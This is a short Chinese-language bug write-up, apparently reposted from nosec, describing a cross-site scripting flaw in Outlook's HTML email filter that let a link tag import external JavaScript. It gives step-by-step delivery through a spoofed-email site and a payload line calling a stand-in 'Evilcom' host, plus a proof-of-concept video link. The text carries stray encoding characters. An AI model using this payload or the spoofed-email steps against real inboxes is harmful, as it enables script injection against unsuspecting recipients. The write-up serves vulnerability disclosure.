信息來源:nosec
大家好,這是我第一次寫漏洞文章�,也是我發(fā)現(xiàn)的第一個(gè)Outlook漏洞���。
在很多網(wǎng)絡(luò)消息服務(wù)中����,例如Gmail���、Outlook、Yahoo等����,都允許接受并渲染電子郵件中的HTML內(nèi)容(Content-Type: text/html),但同時(shí)也會(huì)進(jìn)行安全限制��,只允許A�����、H1��、img等標(biāo)簽���。
而當(dāng)我測(cè)試Outlook中的安全過濾機(jī)制時(shí)��,發(fā)現(xiàn)link標(biāo)簽并不會(huì)被過濾��。這就讓我有機(jī)可乘��,成功引入了外部JS代碼����,實(shí)現(xiàn)了彈框。
具體步驟
1.進(jìn)入網(wǎng)站https://emkei.cz/����,這個(gè)網(wǎng)站的能直接設(shè)置發(fā)送的電子郵件的內(nèi)容的類型。
2.隨機(jī)往郵件主題����、發(fā)件人和發(fā)件地址填入字符。
3.往收件人地址填入你需要測(cè)試的電子郵件地址��。
4.將Content-Type設(shè)定為text/html���。
5.郵件正文填入<link rel=import href=https://Evilcom/filepayload>,點(diǎn)擊提交�����。
6.登入收件電子郵箱��,點(diǎn)擊查看消息,payload就會(huì)成功執(zhí)行�!
以下為PoC視頻地址:
https://youtu.be/khsLfQwy1ik
